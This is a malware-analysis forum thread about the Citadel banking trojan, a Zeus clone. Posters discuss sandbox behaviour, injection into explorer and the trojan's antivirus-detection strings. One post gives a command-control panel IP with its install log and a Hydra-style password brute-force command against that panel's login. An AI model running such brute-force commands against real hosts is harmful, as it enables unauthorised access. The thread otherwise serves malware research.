Citadel (Zeus clone)

Forum for analysis and discussion about malware.

Re: Citadel (Zeus clone)

Postby EP_X0FF » Fri Jan 04, 2013 11:10 am

Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.


Probably it activity restricted by sandbox. Why you want to run malware in VM + Sandboxie?
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Citadel (Zeus clone)

Postby Buster_BSA » Fri Jan 04, 2013 12:05 pm

Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.


Probably the malware is injecting code to a system process and then setting autorun part from there. As Sandboxie does not allow injection to processes running outside the sandbox, the process will fail so autorun too.
Last edited by Buster_BSA on Fri Jan 04, 2013 2:33 pm, edited 1 time in total.
User avatar
Buster_BSA
 
Posts: 390
Joined: Mon Mar 22, 2010 6:42 am
Reputation point: 35

Re: Citadel (Zeus clone)

Postby Cassiel » Fri Jan 04, 2013 12:40 pm

@ EP_X0FF

Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried cuckoo also however I like the reporting from BSA a lot more then cuckoo.

@ Buster_BSA

You are most likely right, I am going to check this with procmon in order to see how the registry keyis being set.


EDIT:

You are right, it is injecting into explorer and after that it is creating the autorun key.
Cassiel
 
Posts: 13
Joined: Mon Dec 17, 2012 12:03 pm
Reputation point: 6

Re: Citadel (Zeus clone)

Postby Buster_BSA » Fri Jan 04, 2013 2:32 pm

Cassiel wrote:You are right, it is injecting into explorer and after that it is creating the autorun key.


I would like such injections were being sucessfully done so BSA analysis can be more complete, but the thing depends on Sandboxie´s restrictions. I am going to talk with Ronen about this and I will ask him if there is any workaround to solve the issue.
User avatar
Buster_BSA
 
Posts: 390
Joined: Mon Mar 22, 2010 6:42 am
Reputation point: 35

Re: Citadel (Zeus clone)

Postby bsteo » Mon Jan 21, 2013 10:10 am

Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM and anti-AVS functions, couldn't run it under Comodo and didn't try manually, maybe someone will do.
You do not have the required permissions to view the files attached to this post.
bsteo
 
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm
Reputation point: 12

Re: Citadel (Zeus clone)

Postby EP_X0FF » Mon Jan 21, 2013 2:36 pm

exitthematrix wrote:Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM


Not found. Except lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with nops) and another lame trick with

Code: Select all
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s


Code: Select all
SafenSoft SysWatch  McAfee  McAfee Security Center  McAfee SecurityCenter   Symantec Client   Symantec Protection   Symantec Shared   Symantec Security   Norton Protection   Kaspersky Security  Kaspersky Anti-Virus  avast! Antivirus  AntiVir Desktop   AVG Monitor   AVG Service   AVG Security  ESET Security   ESET Antivirus  Microsoft Inspection  Microsoft Malware   Microsoft Security


+ viewtopic.php?p=17553#p17553

Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263

No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Citadel (Zeus clone)

Postby bsteo » Mon Jan 21, 2013 4:46 pm

Thank you very much for the tips and help :)
bsteo
 
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm
Reputation point: 12

Re: Citadel (Zeus clone)

Postby Xylitol » Mon Jan 21, 2013 5:08 pm

Code: Select all
• dns: 1 ›› ip: 62.109.1.7 - adresse: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login

Code: Select all
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --

EP_X0FF wrote:No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Code: Select all
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."

And it's the same command for bruteforce Zeus, Ice9, Citadel.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: Citadel (Zeus clone)

Postby bsteo » Mon Jan 21, 2013 6:59 pm

If someone needs the PHP Admin Panel of this slavik mod shit let me know I can upload it.
bsteo
 
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm
Reputation point: 12

Re: Citadel (Zeus clone)

Postby R136a1 » Sat Feb 02, 2013 10:27 am

Seems like Citadel is the new favorite toy of some criminal gangs targeting government organizations:

McAfee Blog: http://blogs.mcafee.com/mcafee-labs/lab ... del-trojan

HitmanPro Blog: https://hitmanpro.wordpress.com/2013/02 ... onnection/
User avatar
R136a1
 
Posts: 216
Joined: Wed Jul 13, 2011 4:30 pm
Location: Germany
Reputation point: 136

PreviousNext

Return to Malware

Who is online

Users browsing this forum: No registered users and 12 guests